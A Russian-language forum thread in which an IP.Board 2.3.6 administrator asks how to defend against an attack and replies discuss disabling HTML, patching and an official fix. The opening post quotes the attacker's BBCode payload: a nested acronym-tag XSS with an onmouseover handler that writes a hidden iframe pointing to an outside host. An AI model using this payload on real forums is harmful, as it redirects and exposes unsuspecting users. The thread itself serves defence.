Перейти к содержимому
Открыть в приложении

Удобный способ просмотра. Узнать больше.

Дизайн и модификация Invision Community

Полноэкранное приложение на главном экране с push-уведомлениями, медалями и многим другим.

Чтобы установить это приложение на iOS и iPadOS
  1. Нажмите иконку «Поделиться» в Safari
  2. Прокрутите меню и нажмите На экран «Домой».
  3. Нажмите Добавить в правом верхнем углу.
Чтобы установить это приложение на Android
  1. Нажмите меню из трёх точек (⋮) в правом верхнем углу браузера.
  2. Нажмите Добавить на главный экран или Установить приложение.
  3. Подтвердите, нажав Установить.
Русский язык для Invision Community 5

Пытаются взломать что делать

Есть форум ipb

 

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

 

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

 

 

вот как работает тег акронима:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

 

Как защититься и что делать?

 

тема обсуждается тут

http://ipbskins.ru/forum/topic5228.html

http://forum.searchengines.ru/showthread.php?p=6476617

http://forum.antichat.ru/showthread.php?p=1960546

http://forums.ibresource.ru/index.php?showtopic=60138

Изменено пользователем fagediba

Рекомендованные сообщения

Есть форум ipb

IP.Board версия: 1.x ?

 

Как защититься и что делать?

1. Использовать не ломанную версию форума со всеми патчами безопасности.

 

2. Разрешить HTML в сообщениях?

Если функция включена, то пользователи могут использовать HTML в личных сообщениях. Рекомендуем отключить данную функцию из соображений безопасности.

 

3. Разрешить HTML в подписи?

Разрешение данной функции НЕ рекомендуется, если вы не полностью доверяете пользователям, которым разрешено добавлять подпись.

  • Автор

236 форум, хтмл теги атакующий не использовал

  • Автор

Атакующий скрыл подпись под цвет фона

color="#EEF2F7"

 

Можно ли как-то запретить использовать в теге любые цвета? только те оставить, которые black, red и тд.?

 

Тогда левые скрипты на странице хотя бы будут видны

тема обсуждается тут

Смысл так плодить тему....

 

К тому, что написал Ritsuka, добавить нечего.

 

+ жалоба в freehostia.com

  • Автор

> К тому, что написал Ritsuka, добавить нечего.

 

ну запретил я акроним, запретил онмаузовер, и что, это остановит чтоли? значит используя другие теги построят свою конструкцию. Нужно чтобы грамотно кто-нибудь составил изменения в обработчик парсера

bb- коды в подписях отключила...

Спасибо.

  • Автор

Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим. Извиняюсь что расплодил код, сейчас его уже не убрать, я не думал что так сложно будет этому противодействовать

 

http://forums.ibresource.ru/index.php?showtopic=60138

 

вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает

Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим.

Угу.

 

 

вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает

Разместил (ОН). Я читал молча, добавить было нечего

  • Автор

Официальный фикс xss с акронимом в 2.3.6

 

Изменения

 

sources/classes/bbcode/class_bbcode_core.php

Изменено пользователем Ph-A
Код битый, нельзя использовать

Создайте аккаунт или войдите в него для комментирования

Аккаунт

Навигация

Поиск

Поиск

Настроить push-уведомления браузера

Chrome (Android)
  1. Нажмите на иконку замка рядом с адресной строкой.
  2. Нажмите Права доступа -> Уведомления.
  3. Измените свои настройки.
Chrome (компьютер)
  1. Нажмите на иконку замка в адресной строке.
  2. Выберите Настройки сайта.
  3. Найдите Уведомления и измените свои настройки.